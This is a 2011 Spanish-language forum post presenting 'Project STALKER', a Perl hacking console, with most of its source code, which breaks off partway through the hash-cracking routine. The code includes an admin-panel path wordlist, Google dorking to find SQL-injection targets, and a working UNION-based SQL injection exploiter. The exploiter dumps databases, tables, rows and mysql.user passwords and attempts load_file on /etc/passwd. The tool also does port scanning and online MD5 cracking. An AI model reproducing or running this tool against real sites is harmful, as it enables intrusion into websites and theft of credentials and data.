[Perl] Project STALKER

Iniciado por BigBear, Agosto 19, 2011, 11:30:36 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 19, 2011, 11:30:36 PM Ultima modificación: Marzo 14, 2015, 10:16:20 AM por Expermicid
Bueno esta es la nueva version de la consola que eh estado haciendo en perl con las siguiente funciones

  • Mejoras

    [++] Diseño
    [++] Repare algunos bugs
    [++] Mejor manejo con control+c
    [++] Agregue un cliente mysql

  • Opciones

    [++] Reconocer ip de un host
    [++] Capturar todos los links de una pagina
    [++] Tener una lista de todos los procesos de windows con posibilidad de cerrar el que queramos
    [++] Cliente mediante sockets
    [++] Reconocer los metodos HTTP en una web
    [++] Captura links y busca posibles paths para listado de directorios
    [++] Encode/decode para base64,hex,ascii
    [++] Scanner Port
    [++] Busca panel de admin
    [++] k0bra incorporado (Scanner SQLI)
    [++] Cliente FTP
    [++] Navegador de archivos con posibilidad de borrar,renombrar archivos o directorios
    [++] Scan Google para buscar paginas vulnerables a SQLI

    El codigo es el siguiente

    Código: perl

    #!usr/bin/perl
    #Project STALKER (C) Doddy Hackman 2011
    #
    #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
    #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
    #
    #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
    #

    use IO::Socket;
    use HTML::LinkExtor;
    use LWP::UserAgent;
    use Win32::OLE qw(in);
    use Win32::Process;
    use Net::FTP;
    use Cwd;
    use URI::Split qw(uri_split);
    use MIME::Base64;
    use DBI;
    use Color::Output;
    Color::Output::Init

    @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
    ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
    ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
    ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
    ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
    ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
    ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
    ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
    ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
    ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
    ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
    ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
    ,'administration/','administration/index.php','administration/login.php'
    ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
    ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
    ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
    ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
    ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
    ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
    ,'administrator/','administrator/index.html','administrator/login.html'
    ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
    ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
    ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
    ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
    ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
    ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
    ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
    ,'administrator/login.asp','administrator/account.asp','administrator.asp'
    ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
    ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
    ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
    ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
    ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
    ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
    ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
    ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
    ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
    ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
    ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
    ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
    ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
    ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
    ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
    ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
    ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
    ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
    ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
    ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
    ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
    ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
    ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
    ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
    ,'server/','database_administration/','power_user/','system_administration/'
    ,'ss_vms_admin_sm/');


    unless (-d "/logs/webs") {
    mkdir("logs/",777);
    mkdir("logs/webs/",777);
    }

    my $nave = LWP::UserAgent->new;
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $nave->timeout(5);

    head();

    getinfo();

    $SIG{INT} = \&next;

    while(1) {
    cprint "\x037"; #13
    menujo();
    cprint "\x030";
    }

    sub getinfo {
    $so = $^O;
    $login = Win32::LoginName();
    $domain = Win32::DomainName();
    cprint "\x0313"; #13
    print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
    cprint "\x030";
    }


    sub menujo {
    print "\n\n>";
    chomp (my $cmd = <stdin>);
    print "\n\n";

    if ($cmd=~/getinfo/ig) {
    getinfo();
    }
    elsif ($cmd =~/getip (.*)/) {
    my $te = $1;
    if ($te eq "" or $te eq " ") {
    print "\n[+] sintax : getip <host>\n";
    }
    print "\n[IP] : ".getip($1)."\n";
    print "\n";
    }

    elsif ($cmd =~/getlink (.*)/) {
    print "[+] Extracting links in the page\n\n\n";
    $code = toma($1);
    my @re = get_links($code);
    for my $url(@re) {
    chomp $url;
    print "[Link] : $url\n";
    }
    print "\n\n[+] Finish\n";
    }

    elsif ($cmd=~/help/) {
    helpme();
    }

    elsif ($cmd=~/getprocess/) {
    my %re = getprocess();


    for my $data(keys %re) {
    ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
    print "[+] Proceso : ".$data."\n";
    print "[+] PID : ".$re{$data}."\n\n";
    }
    }
    elsif ($cmd=~/killprocess (.*) (.*)/) {
    if (killprocess($1,$2)) {
    print "[+] Process $1 closed";
    }
    }
    elsif ($cmd=~/conec (.*) (.*) (.*)/) {
    print conectar($1,$2,$3);
    }
    elsif ($cmd=~/allow (.*)/) {
    $re = conectar($1,"80","GET / HTTP/1.0\r\n");
    if ($re=~/Allow:(.*)/ig) {
    print "[+] Metodos : ".$1."\n";
    }}
    elsif ($cmd=~/paths (.*)/) {
    scanpaths($1);
    }
    elsif ($cmd=~/encodehex (.*)/) {
    print "\n\n[+] ".hex_en($1)."\n\n";
    }
    elsif ($cmd=~/decodehex (.*)/) {
    print "\n\n[+] ".hex_de($1)."\n\n";
    }
    elsif ($cmd=~/download (.*) (.*)/) {
    my $file,$name = $1,$2;
    if (download($1,$2)) {
    print "[+] File downloaded\n";
    }
    }
    elsif ($cmd=~/encodeascii (.*)/) {
    print "\n\n[+] ".ascii($1)."\n\n";
    }
    elsif ($cmd=~/decodeascii (.*)/) {
    print "\n\n[+] ".ascii_de($1)."\n\n";
    }
    elsif ($cmd=~/encodebase (.*)/) {
    print "\n\n[+] ".base($1)."\n\n";
    }
    elsif ($cmd=~/decodebase (.*)/) {
    print "\n\n[+] ".base_de($1)."\n\n";
    }
    elsif ($cmd=~/aboutme/) {
    aboutme();
    }
    elsif ($cmd=~/scanport (.*)/) {
    scanport($1);
    }
    elsif ($cmd=~/panel (.*)/) {
    scanpanel($1);
    }
    elsif ($cmd=~/scangoogle/) {
    print "[Dork] : ";
    chomp(my $dork = <stdin>);
    print "\n\n[Pages] : ";
    chomp(my $pages = <stdin>);
    print "\n\n[Starting the search]\n\n";
    my @links = google($dork,$pages);
    print "\n[Links Found] : ".int(@links)."\n\n\n";
    print "[Starting the scan]\n\n\n";
    for my $link(@links) {
    if ($link=~/(.*)=/ig) {
    my $web = $1;
    sql($web."=");
    }}
    print "\n\n[+] Finish\n";
    }
    elsif ($cmd=~/getpass (.*)/) {
    crackit($1);
    }
    elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
    ftp($1,$2,$3);
    }
    elsif ($cmd=~/navegator/) {
    nave:
    print getcwd().">";
    chomp(my $rta = <stdin>);
    print "\n\n";
    if ($rta=~/list/) {
    my @files = coleccionar(getcwd());
    for(@files) {
    if (-f $_) {
    print "[File] : ".$_."\n";
    } else {
    print "[Directory] : ".$_."\n";
    }}}
    if ($rta=~/cd (.*)/) {
    my $dir = $1;
    if (chdir($dir)) {
    print "\n[+] Directory changed\n";
    } else {
    print "\n[-] Error\n";
    }}
    if ($rta=~/del (.*)/) {
    my $file = getcwd()."/".$1;
    if (-f $file) {
    if (unlink($file)) {
    print "\n[+] File Deleted\n";
    } else {
    print "\n[-] Error\n";
    }
    } else {
    if (rmdir($file)) {
    print "\n[+] Directory Deleted\n";
    } else {
    print "\n[-] Error\n";
    }}}
    if ($rta=~/rename (.*) (.*)/) {
    if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
    print "\n[+] File Changed\n";
    } else {
    print "\n[-] Error\n";
    }}
    if ($rta=~/open (.*)/) {
    my $file = $1;
    chomp $file;
    system($file);
    #system(getcwd()."/".$file);
    }
    if ($rta=~/help/) {
    print "\nCommands : help cd list del rename open exit\n\n";
    }
    if ($rta=~/exit/) {
    next;
    }
    print "\n\n";
    goto nave;
    }
    elsif ($cmd=~/kobra (.*)/) {
    my $url = $1;
    chomp $url;
    scansqli($url,"--");
    }
    elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
    enter($1,$2,$3);
    }
    elsif ($cmd=~/exit/) {
    copyright();
    <stdin>;
    exit(1);
    }
    else {
    system($cmd);
    }
    #print "\n\n";
    }


    sub scansqli {
    print "[Status] : Scanning.....\n";
    $pass = &bypass($_[1]);
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    if ($_[0]=~/hackman/ig) {
    savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
    &menu_options($_[0],$pass,$save);
    }
    my ($gen,$save,$control) = &length($_[0],$_[1]);
    if ($control eq 1) {
    print "[Status] : Enjoy the menu\n\n";
    &menu_options($gen,$pass,$save);
    } else {
    print $control;
    print "[Status] : Length columns not found\n\n";
    menujo();
    }
    }

    sub length {
    my $rows  = "0";
    my $asc;
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[1]);
    $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
    $code = toma($inyection);
    if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
    my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
    my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
    unless ($testar1 eq $testar2) {
    my $patha = $1;
    chomp $patha;
    $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
    $total = "1";
    for my $rows(2..200) {
    $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
    $total.= ",".$rows;
    $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
    $test = toma($injection);
    if ($test=~/RATSXPDOWN/) {
    @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
    $control = 1;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    savefile($save.".txt","\n[Target confirmed] : $page");
    savefile($save.".txt","[Bypass] : $_[1]\n");
    savefile($save.".txt","[Limit] : The site has $rows columns");
    savefile($save.".txt","[Data] : The number @number print data");
    if ($patha) {
    savefile($save.".txt","[Full Path Discloure] : $patha");
    }
    $total=~s/$number[0]/hackman/;
    savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
    return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
    }}}}}


    sub details {
    my ($page,$bypass,$save) = @_;
    ($pass1,$pass2) = &bypass($bypass);
    savefile($save.".txt","\n");
    if ($page=~/(.*)hackman(.*)/ig) {
    print "\n\n[+] Searching information..\n\n";
    my  ($start,$end) = ($1,$2);
    $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
    $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
    $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    $test1 = toma($inforschema);
    $test2 = toma($mysqluser);
    if ($test2=~/ERTOR854/ig) {
    savefile($save.".txt","[mysql.user] : ON");
    print "[mysql.user] : ON\n";
    } else {
    print "[mysql.user] : OFF\n";
    savefile($save.".txt","[mysql.user] : OFF");
    }
    if ($test1=~/ERTOR854/ig) {
    print "[information_schema.tables] : ON\n";
    savefile($save.".txt","[information_schema.tables] : ON");
    } else {
    print "[information_schema.tables] : OFF\n";
    savefile($save.".txt","[information_schema.tables] : OFF");
    }
    if ($test3=~/ERTOR854/ig) {
    print "[+] load_file permite ver los archivos\n";
    savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    }
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
    $injection = $start.$concat.$end.$pass2;
    $code = toma($injection);
    if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
    print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
    savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
    } else {
    print "\n[-] Not found any data\n";
    }}}


    sub menu_options {

    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    print "\n/logs/webs/$save>";
    chomp (my $rta = <stdin>);

    if ($rta=~/help/) {
    print qq(

    commands : details tables columns dbs othertable othercolumn
               mysqluser dumper logs exit

    );
    }


    if ($rta =~/tables/) {
    schematables($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta =~/columns (.*)/) {
    my $tabla = $1;
    schemacolumns($_[0],$_[1],$save,$tabla);
    &reload;
    }
    elsif ($rta =~/dbs/) {
    &schemadb($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta =~/othertable (.*)/) {
    my $data = $1;
    &schematablesdb($_[0],$_[1],$data,$save);
    &reload;
    }
    elsif ($rta =~/othercolumn (.*) (.*)/){
    my ($db,$table) = ($1,$2);
    &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
    &reload;
    }
    elsif ($rta =~/mysqluser/) {
    &mysqluser($_[0],$_[1],$save);
    &reload;
    }
    elsif ($rta=~/logs/) {
    $t = "logs/webs/$save.txt";
    system("start $t");
    &reload;
    }
    elsif ($rta=~/exit/) {
    next;
    }

    elsif ($rta=~/dumper (.*) (.*) (.*)/) {
    my ($tabla,$col1,$col2) = ($1,$2,$3);
    &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
    &reload;
    }
    elsif ($rta =~/details/) {
    &details($_[0],$_[1],$save);
    &reload;
    }
    else {
    &reload;
    }
    }



    sub schematables {
    $real = "1";
    my ($page,$bypass,$save) = @_;
    savefile($save.".txt","\n");
    print "\n";
    my $page1 = $page;
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","[DB] : default");
    print "\n[+] Searching tables with schema\n\n";
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $resto = $1;
    $total = $resto - 17;
    print "[+] Tables Length :  $total\n\n";
    savefile($save.".txt","[+] Searching tables with schema\n");
    savefile($save.".txt","[+] Tables Length :  $total\n");
    my $limit = $1;
    for my $limit(17..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    print "[Table $real Found : $table ]\n";
    savefile($save.".txt","[Table $real Found : $table ]");
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    }

    sub reload {
    &menu_options($_[0]);
    }


    sub schemacolumns {
    my ($page,$bypass,$save,$table) = @_;
    my $page3 = $page;
    my $page4 = $page;
    savefile($save.".txt","\n");
    print "\n";
    ($pass1,$pass2) = &bypass($bypass);
    print "\n[DB] : default\n";
    savefile($save.".txt","[DB] : default");
    savefile($save.".txt","[Table] : $table\n");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns Length : $1 ]\n\n";
    savefile($save.".txt","[Columns Length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    sub schemadb {
    my ($page,$bypass,$save) = @_;
    my $page1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Searching DBS\n\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $limita = $1;
    print "[+] Databases Length : $limita\n\n";
    savefile($save.".txt","[+] Databases Length : $limita\n");
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit(0..$limita) {
    $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $control = $1;
    if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
    print "[Database $real Found] $control\n";
    savefile($save.".txt","[Database $real Found] : $control");
    $real++;
    }
    }
    }
    print "\n";
    } else {
    print "[-] information_schema = ERROR\n";
    }
    }

    sub schematablesdb {
    my $page = $_[0];
    my $db = $_[2];
    my $page1 = $page;
    savefile($_[3].".txt","\n");
    print "\n\n[+] Searching tables with DB $db\n\n";
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($_[3].".txt","[DB] : $db");
    $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
    print "[+] Tables Length :  $1\n\n";
    savefile($_[3].".txt","[+] Tables Length :  $1\n");
    my $limit = $1;
    $real = "1";
    for my $lim(0..$limit) {
    $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
    #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
    if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    my $table = $1;
    chomp $table;
    savefile($_[3].".txt","[Table $real Found : $table ]");
    print "[Table $real Found : $table ]\n";
    $real++;
    }}
    print "\n";
    } else {
    print "\n[-] information_schema = ERROR\n";
    }}

    sub schemacolumnsdb {
    my ($page,$bypass,$db,$table,$save) = @_;
    my $page3 = $page;
    my $page4 = $page;
    print "\n\n[+] Searching columns in table $table with DB $db\n\n";
    savefile($save.".txt","\n");
    ($pass1,$pass2) = &bypass($_[1]);
    savefile($save.".txt","\n[DB] : $db");
    savefile($save.".txt","[Table] : $table");
    $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
    if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[Columns length : $1 ]\n\n";
    savefile($save.".txt","[Columns length : $1 ]\n");
    my $si = $1;
    chomp $si;
    $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $real = "1";
    for my $limit2(0..$si) {
    $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "[Column $real] : $1\n";
    savefile($save.".txt","[Column $real] : $1");
    $real++;
    }
    }
    } else {
    print "\n[-] information_schema = ERROR\n";
    }
    print "\n";
    }

    sub mysqluser {
    my ($page,$bypass,$save) = @_;
    my $cop = $page;
    my $cop1 = $page;
    savefile($save.".txt","\n");
    print "\n\n[+] Finding mysql.users\n";
    ($pass1,$pass2) = &bypass($bypass);
    $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code=~/RATSXPDOWN/ig){
    $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
    if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    print "\n[+] Users Found : $1\n\n";
    savefile($save.".txt","\n[+] Users mysql Found : $1\n");
    for my $limit(0..$1) {
    $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
    $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
    print "[Host] : $1 [User] : $2 [Password] : $3\n";
    savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
    } else {
    print "\n";
    &reload;
    }
    }
    }
    } else {
    print "\n[-] mysql.user = ERROR\n\n";
    }
    }

    sub dump {
    savefile($_[5].".txt","\n");
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[4]);
    if ($page=~/(.*)hackman(.*)/){
    my $start = $1;
    my $end = $2;
    print "\n\n[+] Extracting values...\n\n";
    $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
    $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
    $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
    if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
    $tota = $1;
    print "[+] Table : $_[3]\n";
    print "[+] Length of the rows : $tota\n\n";
    print "[$_[1]] [$_[2]]\n\n";
    savefile($_[5].".txt","[Table] : $_[3]");
    savefile($_[5].".txt","[+] Length of the rows: $tota\n");
    savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
    for my $limit(0..$tota) {
    chomp $limit;
    $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
    if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
    savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
    print "[$_[1]] : $1   [$_[2]] : $2\n";
    } else {
    print "\n\n[+] Extracting Finish\n\n";
    &reload;
    }
    }
    } else {
    print "[-] Not Found any DATA\n\n";
    }}}

    sub bypass {
    if ($_[0] eq "/*") { return ("/**/","/*"); }
    elsif ($_[0] eq "%20") { return ("%20","%00"); }
    else {return ("+","--");}}

    sub ascii {
    return join ',',unpack "U*",$_[0];
    }

    sub base {
    $re = encode_base64($_[0]);
    chomp $re;
    return $re;
    }

    sub base_de {
    $re = decode_base64($_[0]);
    chomp $re;
    return $re;
    }


    sub download {
    if ($nave->mirror($_[0],$_[1])) {
    if (-f $_[1]) {
    return true;
    }}}


    sub hex_en {
    my $string = $_[0];
    $hex = '0x';
    for (split //,$string) {
    $hex .= sprintf "%x", ord;
    }
    return $hex;
    }

    sub hex_de {
    my $text = shift;
    $text =~ s/^0x//;
    $encode = join q[], map { chr hex } $text =~ /../g;
    return $encode;
    }

    sub ascii_de {
    my $text = shift;
    $text = join q[], map { chr } split q[,],$text;
    return $text;
    }

    sub getprocess {

    my %procesos;

    my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
    my $dos = $uno->ConnectServer("","root\\cimv2");

    foreach my $pro (in $dos->InstancesOf("Win32_Process")){
    $procesos{$pro->{Caption}} = $pro->{ProcessId};
    }
    return %procesos;
    }

    sub killprocess {

    my ($numb,$pid) = @_;

    if (Win32::Process::KillProcess($pid,$numb)) {
    return true;
    } else {
    return false;
    }
    }

    sub getip {
    my $get = gethostbyname($_[0]);
    return inet_ntoa($get);
    }

    sub crackit {

    my $secret = $_[0];

    print "[+] Cracking $_[0]\n\n";

    my %hash = (
       
    'http://passcracking.com/' => {
    'tipo'  => 'post',
    'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
    'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
    },   
    'http://md5.hashcracking.com/search.php?md5=' =>  {
    'tipo' => 'get',
    'regex' => 'Cleartext of $_[0] is (.*)',
    },
    'http://www.bigtrapeze.com/md5/' =>  {
    'tipo' => 'post',
    'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
    'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
    },
    'http://opencrack.hashkiller.com/' =>  {
    'tipo' => 'post',
